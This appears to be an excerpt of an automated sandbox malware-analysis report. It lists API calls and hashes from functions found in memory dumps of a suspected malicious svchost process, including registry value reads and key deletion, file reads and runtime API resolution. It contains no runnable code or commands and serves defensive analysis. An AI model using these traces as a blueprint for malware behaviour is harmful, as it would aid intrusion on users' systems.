                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFreeValidatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 470506929-0
                                                                                                                                                                                                                • Opcode ID: c6e583ea8e881373f6f6720d0a21ff2ac60342c526697596e44c80471fafb1bb
                                                                                                                                                                                                                • Instruction ID: 6cbe0e386b93e5c4ba5ac6e9d6bf83fa9c0e109dfffbfd9aaf748d7f3c1065ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6e583ea8e881373f6f6720d0a21ff2ac60342c526697596e44c80471fafb1bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F221A6B1A017009FC720AF65D988A9BBFE9FF45754B40881DE59EDB300CB749945CFA2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D27220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
                                                                                                                                                                                                                  • Part of subcall function 02D27220: RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
                                                                                                                                                                                                                  • Part of subcall function 02D27220: memset.MSVCRT ref: 02D272A7
                                                                                                                                                                                                                  • Part of subcall function 02D27220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
                                                                                                                                                                                                                  • Part of subcall function 02D27220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
                                                                                                                                                                                                                  • Part of subcall function 02D27220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
                                                                                                                                                                                                                  • Part of subcall function 02D27220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
                                                                                                                                                                                                                  • Part of subcall function 02D27220: HeapValidate.KERNEL32(00000000), ref: 02D2731B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75B0A250,02D338FF), ref: 02D2769C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D276A3
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D276B3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75B0A250,02D338FF), ref: 02D276D5
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D276D8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D276E5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D276E8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$Validatememset$AllocAllocateCreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4191958461-0
                                                                                                                                                                                                                • Opcode ID: 8cfa51b72d6f6a54e14fd936998628e9fa09ef6de35356859d4aad6b62402e16
                                                                                                                                                                                                                • Instruction ID: efe45ee9b1f507178df66b124c9c79dc7ef177f475e7e8e45b8dc7e78b53f6f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cfa51b72d6f6a54e14fd936998628e9fa09ef6de35356859d4aad6b62402e16
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3211A371A4122567E770AAA9AC48F5BB76DDF9575AF110118F904D7340CB60DD08C6F1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D44550: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4457D
                                                                                                                                                                                                                  • Part of subcall function 02D44550: GetProcessTimes.KERNEL32(00000000,?,?,?,02D373C7,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4459A
                                                                                                                                                                                                                  • Part of subcall function 02D44550: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D445B2
                                                                                                                                                                                                                  • Part of subcall function 02D44550: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02D373C7,00000000), ref: 02D445C3
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02D6FB80,00001B0C,00000000,00000000,008D48B8,02D37534), ref: 02D37288
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D372A4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,008D48B8), ref: 02D372C9
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D372CC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,008D48B8), ref: 02D372D9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D372DC
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D372E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3901171168-0
                                                                                                                                                                                                                • Opcode ID: 0c7afd6da335b517d3872eb10a2b4f02e35741645c6aed1195dc2ffaf349796d
                                                                                                                                                                                                                • Instruction ID: 98f28b0c2639fd486dda3418c353ab5e144aa453b81c8c4d056c1a4ac4ebd0dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c7afd6da335b517d3872eb10a2b4f02e35741645c6aed1195dc2ffaf349796d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD012476E41A11ABE7205FA4F84CB1AB754EFC8B627244815F24A93304C7308C54CBF0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040194A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
                                                                                                                                                                                                                • Instruction ID: 42b0d571b2b9ac5a956892dcf26f74189b3fac86f907fc126faefe0e596b578b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B601A771600314DBC7149FBAAC81996B759AB88B15710443AEA09E32D3C63DDC05CBBC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,02D23BCE), ref: 02D23A34
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,a1633ef1a,00000000,?,00000000,?), ref: 02D23A55
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 02D23A63
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                • String ID: a1633ef1a$software\microsoft
                                                                                                                                                                                                                • API String ID: 3677997916-2677533378
                                                                                                                                                                                                                • Opcode ID: e1d2c86795296f11ed062347a33f46cabdefdd40ef4d0bbfd66614ccaba6de2e
                                                                                                                                                                                                                • Instruction ID: 77d61d63fdc167843570461a8e46d6381482abdb878bd61ddef91ba30d8622ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1d2c86795296f11ed062347a33f46cabdefdd40ef4d0bbfd66614ccaba6de2e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94F03174E40308FBEB00CFA4DC49FAE77B8EB08705F504598E905A6380D7759A54CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4C069
                                                                                                                                                                                                                  • Part of subcall function 02D50A00: __WSAFDIsSet.WS2_32(?,?), ref: 02D50AB0
                                                                                                                                                                                                                  • Part of subcall function 02D50A00: closesocket.WS2_32(?), ref: 02D50ACD
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02D4C075
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4C0AD
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02D4C0B9
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4C10C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$realloc$closesocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3133911991-0
                                                                                                                                                                                                                • Opcode ID: 221da08993a6ae6613cb9bc1d6d4d601d2ff02ebf283f7377a9c592d37c26dd3
                                                                                                                                                                                                                • Instruction ID: ef6d8ec93fdfe92142376bedc1b36a0112864dbfd791de7f9b185b83dee71803
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221da08993a6ae6613cb9bc1d6d4d601d2ff02ebf283f7377a9c592d37c26dd3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A491D971A116558FCF04CF24ED94AEA37A2EF88305F0885B9ED0D9B346E774AD15CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D340B9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D340EC
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D34118
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D3413F
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D341BC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 5f1a5a6b03424fff6564bfa2aa58ed75b1bc322d406848a38a75f13c977fc239
                                                                                                                                                                                                                • Instruction ID: 43c04a80b69581973ebf764416fff438829a352de6fb5e5fedc41577c5f31ec9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f1a5a6b03424fff6564bfa2aa58ed75b1bc322d406848a38a75f13c977fc239
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09410C70D00618AFDB51DFA8D884AAEBBF5EF58300F50852AE815E7300D778AD41CFA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D33E59
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D33E8C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D33EB8
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D33EDF
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D33F5C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 54060bcedd09d4d737149c8a3db663bc50a5a21ff8032b57286cca975a7b2da7
                                                                                                                                                                                                                • Instruction ID: 654f4259af74c3908dfed8a6fe66a1a4c08004cfc321f3192be3852f4c6ee270
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54060bcedd09d4d737149c8a3db663bc50a5a21ff8032b57286cca975a7b2da7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A410A70E00218AFDB51DFA8D984AAEBBF5EB48300F90856AE459E7340D774AD41CFE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D213DE
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2141A
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D21446
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2146D
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D21498
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: f858cc85cc553e1d06393e408d9ce4acafcc2d00c73bbe114e1c6f1d407518a0
                                                                                                                                                                                                                • Instruction ID: 0533434fbfbc878083e4a1c61a466f23bc2a35d5ac9d033b151ef1f18286c002
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f858cc85cc553e1d06393e408d9ce4acafcc2d00c73bbe114e1c6f1d407518a0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4531CAB1D00209AFDB40CFA8D885AEEBBF5FB5C314F50852AE918E3301E77499458FA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D38FE9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D3901C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D39048
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D3906F
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D3909E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 88d63e8a240668f737d7522926218a865d03b09a9a1f0c28c72eb559d58a0230
                                                                                                                                                                                                                • Instruction ID: 0909b291a9c9fe925c6b29df84dc6db6989650f087cf13a18d2a6db11fd4716c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88d63e8a240668f737d7522926218a865d03b09a9a1f0c28c72eb559d58a0230
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C31B8B5D00219AFDB40CFA8D895AEEBBB5FB58310F50856AE914E7300E775AD41CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 02D39202
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D39233
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D3925F
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D39286
                                                                                                                                                                                                                • WSASetLastError.WS2_32(?), ref: 02D392B9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 9b3dcf8fef1a247ef215c3680d9149078a52ab4cde61d4582cfa3f62e069471e
                                                                                                                                                                                                                • Instruction ID: 61199b565d83731ee19e5de5a6c0ea709b5da412b32d98cc91abac91ff458c6f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b3dcf8fef1a247ef215c3680d9149078a52ab4cde61d4582cfa3f62e069471e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D3188B5D40209AFDB40DFA9D895AEEBBF5FB48300F50856AE919E7300E7749941CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02D48D84), ref: 02D488E3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02D48D84), ref: 02D4890B
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02D48D84), ref: 02D48935
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02D48D84), ref: 02D48943
                                                                                                                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,02D48D84,?), ref: 02D48955
                                                                                                                                                                                                                  • Part of subcall function 02D483F0: GetFileType.KERNEL32(?,00000000,00000000), ref: 02D483F9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 60630809-0
                                                                                                                                                                                                                • Opcode ID: 9db7de7f73c2bef89c8cc66c4c87c3e55e34a5640f76d31f5a5876e6a1b397bc
                                                                                                                                                                                                                • Instruction ID: 69b2a99b545770c5b79b5982573afcf62b279f5818589ddd17b906cc10a6dd72
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9db7de7f73c2bef89c8cc66c4c87c3e55e34a5640f76d31f5a5876e6a1b397bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F82165B29007449FC730CF69D9C49ABF7F8FB48314B500A2EE59AC2A40D775E544CB61
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,02D332AB,00000000,00010108,?,00000000), ref: 02D44E3F
                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02D44E74
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D44E9E
                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(00000104,02D332AB), ref: 02D44EB6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D44EC2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                • Opcode ID: 3c7c8b0abc79b6d9c4fa3eb6daf30cf73ba9dd57f9d54f59aeaf662b09a0d62a
                                                                                                                                                                                                                • Instruction ID: 85515265f49288a7c2cda5290bad73183a4bf27d4301aeb6b7c41f00ffe91aa0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c7c8b0abc79b6d9c4fa3eb6daf30cf73ba9dd57f9d54f59aeaf662b09a0d62a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B214476A40229ABDB20DA98EC44FEAB76CEB44711F144565FD44EB340DAB0DE94CBE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2377537114-0
                                                                                                                                                                                                                • Opcode ID: 6c0013ccb449ce5a3b0777744c21adc175e945885c98debbd78bc3cd58801d71
                                                                                                                                                                                                                • Instruction ID: 911abf69cbd50dd69351e1cf336c8adce7ca7280d439c7c99d9e0e250fdda080
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c0013ccb449ce5a3b0777744c21adc175e945885c98debbd78bc3cd58801d71
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64214FB0A04205AFC714CF59E484B6ABBF5FB69308F50C52DD98AC7311D731EA65CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D25712
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25745
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25771
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25798
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D257B4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
